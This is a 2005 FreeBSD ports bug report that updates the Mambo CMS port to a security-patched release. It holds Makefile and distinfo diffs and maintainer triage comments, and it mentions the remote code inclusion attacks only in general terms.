Bug 89665 - [Security Update]: www/mambo
Summary: [Security Update]: www/mambo
Status: Closed FIXED
Alias: None
Product: Ports & Packages
Classification: Unclassified
Component: Individual Port(s) (show other bugs)
Version: Latest
Hardware: Any Any
: Normal Affects Only Me
Assignee: Marcus Alves Grando
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2005-11-28 11:00 UTC by Francisco Alves Cabrita
Modified: 2005-11-29 19:51 UTC (History)
0 users

See Also:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Francisco Alves Cabrita 2005-11-28 11:00:16 UTC 
There has been a spate of attacks on Mambo sites in the last few days. These have been serious, in that they involved running arbitrary PHP code in the site attacked. This means that the security of information may have been compromised, and back door code may have been installed. Anyone who has been attacked should take great care to ensure that their site has been thoroughly restored to a safe condition. If advice is needed, please post in the Mambo forums.
http://www.mamboserver.com/index.php?option=com_content&task=view&id=172&Itemid=1

Fix: 

This patch, blocks exploits that attempt to set a value
for the global used to indicate where code is to be loaded.  By doing
this, the exploits allow arbitrary code to be loaded from a web site
under the hacker's control.  

Mafile
EXTRACT_DEPENDS=  unzip:${PORTSDIR}/archivers/unzip

NO_BUILD= yes
USE_MYSQL=  yes
USE_PHP=  mysql session zlib gd pdf xml pcre
WANT_PHP_WEB= yes
PKGMESSAGE= ${WRKDIR}/pkg-message
SUB_FILES=  pkg-message
SUB_LIST+=  MAMBO_DIR=${MAMBO_DIR}
PLIST_SUB+= MAMBO_DIR=${MAMBO_DIR}

MAMBO_DIR?= www/${PORTNAME}
DIST_SUBDIR=  ${PORTNAME}

MAMBO_SRC=  MamboV4.5.3-stable.tar.gz
MAMBO_PATCH1= Mambo4523.security_fix.zip

do-extract:
    @${MKDIR} ${WRKSRC}
    @${TAR} -zxf ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_SRC} -C ${WRKSRC}
    @${UNZIP_CMD} -qo ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_PATCH1} -d ${WRKSRC}
    @${RM} -rf ${WRKSRC}/templates/rhuk_solarflare # remove empty

do-install:
    @${MKDIR} ${PREFIX}/${MAMBO_DIR}
    @cd ${WRKSRC} && \
      ${FIND} . -type d -exec ${MKDIR} ${PREFIX}/${MAMBO_DIR}/{} \; \
        -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \;
    @cd ${WRKSRC} && \
      ${FIND} . \! -type d -exec ${INSTALL_DATA} {} ${PREFIX}/${MAMBO_DIR}/{} \; \
        -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \;

post-install:
    @${CAT} ${PKGMESSAGE}

.include <bsd.port.mk>


distfinfo:
EXTRACT_DEPENDS=  unzip:${PORTSDIR}/archivers/unzip

NO_BUILD= yes
USE_MYSQL=  yes
USE_PHP=  mysql session zlib gd pdf xml pcre
WANT_PHP_WEB= yes
PKGMESSAGE= ${WRKDIR}/pkg-message
SUB_FILES=  pkg-message
SUB_LIST+=  MAMBO_DIR=${MAMBO_DIR}
PLIST_SUB+= MAMBO_DIR=${MAMBO_DIR}

MAMBO_DIR?= www/${PORTNAME}
DIST_SUBDIR=  ${PORTNAME}

MAMBO_SRC=  MamboV4.5.3-stable.tar.gz
MAMBO_PATCH1= Mambo4523.security_fix.zip

do-extract:
    @${MKDIR} ${WRKSRC}
    @${TAR} -zxf ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_SRC} -C ${WRKSRC}
    @${UNZIP_CMD} -qo ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_PATCH1} -d ${WRKSRC}
    @${RM} -rf ${WRKSRC}/templates/rhuk_solarflare # remove empty

do-install:
    @${MKDIR} ${PREFIX}/${MAMBO_DIR}
    @cd ${WRKSRC} && \
      ${FIND} . -type d -exec ${MKDIR} ${PREFIX}/${MAMBO_DIR}/{} \; \
        -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \;
    @cd ${WRKSRC} && \
      ${FIND} . \! -type d -exec ${INSTALL_DATA} {} ${PREFIX}/${MAMBO_DIR}/{} \; \
        -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \;

post-install:
    @${CAT} ${PKGMESSAGE}

.include <bsd.port.mk>

pkg-plist:
EXTRACT_DEPENDS=  unzip:${PORTSDIR}/archivers/unzip

NO_BUILD= yes
USE_MYSQL=  yes
USE_PHP=  mysql session zlib gd pdf xml pcre
WANT_PHP_WEB= yes
PKGMESSAGE= ${WRKDIR}/pkg-message
SUB_FILES=  pkg-message
SUB_LIST+=  MAMBO_DIR=${MAMBO_DIR}
PLIST_SUB+= MAMBO_DIR=${MAMBO_DIR}

MAMBO_DIR?= www/${PORTNAME}
DIST_SUBDIR=  ${PORTNAME}

MAMBO_SRC=  MamboV4.5.3-stable.tar.gz
MAMBO_PATCH1= Mambo4523.security_fix.zip

do-extract:
    @${MKDIR} ${WRKSRC}
    @${TAR} -zxf ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_SRC} -C ${WRKSRC}
    @${UNZIP_CMD} -qo ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_PATCH1} -d ${WRKSRC}
    @${RM} -rf ${WRKSRC}/templates/rhuk_solarflare # remove empty

do-install:
    @${MKDIR} ${PREFIX}/${MAMBO_DIR}
    @cd ${WRKSRC} && \
      ${FIND} . -type d -exec ${MKDIR} ${PREFIX}/${MAMBO_DIR}/{} \; \
        -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \;
    @cd ${WRKSRC} && \
      ${FIND} . \! -type d -exec ${INSTALL_DATA} {} ${PREFIX}/${MAMBO_DIR}/{} \; \
        -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \;

post-install:
    @${CAT} ${PKGMESSAGE}

.include <bsd.port.mk>


Thanks in advance
Francisco Alves Cabrita
Comment 1 Edwin Groothuis freebsd_committer freebsd_triage 2005-11-28 11:03:11 UTC 
Maintainer of www/mambo,

Please note that PR ports/89665 has just been submitted.

If it contains a patch for an upgrade, an enhancement or a bug fix
you agree on, reply to this email stating that you approve the patch
and a committer will take care of it.

The full text of the PR can be found at:
    http://www.freebsd.org/cgi/query-pr.cgi?pr=ports/89665

-- 
Edwin Groothuis
edwin@FreeBSD.org
Comment 2 Edwin Groothuis freebsd_committer freebsd_triage 2005-11-28 11:03:18 UTC 
State Changed
From-To: open->feedback

Awaiting maintainers feedback
Comment 3 Francisco Cabrita <include> 2005-11-28 11:23:04 UTC 
I think i have a problem with my copy-past...

The last PR is wrong. This one it correct.

--- Makefile_old	Mon Nov 28 10:52:56 2005
+++ Makefile	Mon Nov 28 10:31:56 2005
@@ -6,9 +6,11 @@

  PORTNAME=	mambo
  PORTVERSION=	4.5.2.3
+PORTREVISION= 1
  CATEGORIES=	www
-MASTER_SITES=	http://mamboforge.net/frs/download.php/4004/:source1 \
-		http://mamboforge.net/frs/download.php/6159/:source2
+MASTER_SITES=	http://mamboforge.net/frs/download.php/6151/:source1 \
+	  http://mamboforge.net/frs/download.php/7636/:source2
+
  DISTFILES=	${MAMBO_SRC}:source1 \
  		${MAMBO_PATCH1}:source2

@@ -29,8 +31,8 @@
  MAMBO_DIR?=	www/${PORTNAME}
  DIST_SUBDIR=	${PORTNAME}

-MAMBO_SRC=	MamboV4.5.2-Stable.tar.gz
-MAMBO_PATCH1=	Patch_4.5.2_to_4.5.2.3.zip
+MAMBO_SRC=	MamboV4.5.3-stable.tar.gz
+MAMBO_PATCH1=	Mambo4523.security_fix.zip

  do-extract:
  		@${MKDIR} ${WRKSRC}


--- distinfo_old	Mon Nov 28 10:52:56 2005
+++ distinfo	Mon Nov 28 10:31:13 2005
@@ -1,4 +1,6 @@
-MD5 (mambo/MamboV4.5.2-Stable.tar.gz) = 6f4f934bc26ceed05137a23a1dcf8a54
-SIZE (mambo/MamboV4.5.2-Stable.tar.gz) = 1561319
-MD5 (mambo/Patch_4.5.2_to_4.5.2.3.zip) = 3202877a1f03b2ff723bf5a2c1f07869
-SIZE (mambo/Patch_4.5.2_to_4.5.2.3.zip) = 88505
+MD5 (mambo/MamboV4.5.3-stable.tar.gz) = 8b72f304d6347935ebad42e0daa37b1a
+SHA256 (mambo/MamboV4.5.3-stable.tar.gz) = 
ef3fe42f5e65f27bdeb3becb673964aa237896f03d0959c06863c4d80b565e93
+SIZE (mambo/MamboV4.5.3-stable.tar.gz) = 1523660
+MD5 (mambo/Mambo4523.security_fix.zip) = 488d72591808f2116f1422733ad8f514
+SHA256 (mambo/Mambo4523.security_fix.zip) = 
07bfe5d3f74e4645e99d4e97041f4fb93cfcc5f6160e0a0f46a2ea7f773ec7d6
+SIZE (mambo/Mambo4523.security_fix.zip) = 10415


--- pkg-plist_old	Mon Nov 28 10:52:56 2005
+++ pkg-plist	Mon Nov 28 10:45:50 2005
@@ -1,5 +1,5 @@
  @exec mkdir -p %D/%%MAMBO_DIR%%/cache/com_banners
-%%MAMBO_DIR%%/CHANGELOG
+%%MAMBO_DIR%%/read_me.txt
  %%MAMBO_DIR%%/INSTALL
  %%MAMBO_DIR%%/LICENSE
  %%MAMBO_DIR%%/administrator/backups/index.html
@@ -1247,7 +1247,6 @@
  @dirrm %%MAMBO_DIR%%/components/com_contact
  @dirrm %%MAMBO_DIR%%/components/com_banners
  @dirrm %%MAMBO_DIR%%/components
-@dirrm %%MAMBO_DIR%%/cache/com_banners
  @dirrm %%MAMBO_DIR%%/cache
  @dirrm %%MAMBO_DIR%%/administrator/templates/mambo_admin_blue/images
  @dirrm %%MAMBO_DIR%%/administrator/templates/mambo_admin_blue/css

sorry, monday morning problems :)

Francisco
--
Nucleo Portugues de FreeBSD - Core Member
http://npf.pt.freebsd.org
http://npf.pt.freebsd.org/~include/
Comment 4 Francisco Cabrita <include> 2005-11-28 11:59:22 UTC 
Yes

--
Nucleo Portugues de FreeBSD - Core Member
http://npf.pt.freebsd.org
http://npf.pt.freebsd.org/~include/

On Mon, 28 Nov 2005, Edwin Groothuis wrote:

> Synopsis: [Security Update]: www/mambo
>
> State-Changed-From-To: open->feedback
> State-Changed-By: edwin
> State-Changed-When: Mon Nov 28 11:03:18 GMT 2005
> State-Changed-Why:
> Awaiting maintainers feedback
>
> http://www.freebsd.org/cgi/query-pr.cgi?pr=89665
>
Comment 5 Marcus Alves Grando freebsd_committer freebsd_triage 2005-11-29 19:32:16 UTC 
Responsible Changed
From-To: freebsd-ports-bugs->mnag

I'll take it.
Comment 6 Marcus Alves Grando freebsd_committer freebsd_triage 2005-11-29 19:51:00 UTC 
State Changed
From-To: feedback->closed

Committed, with minor changes. Thanks!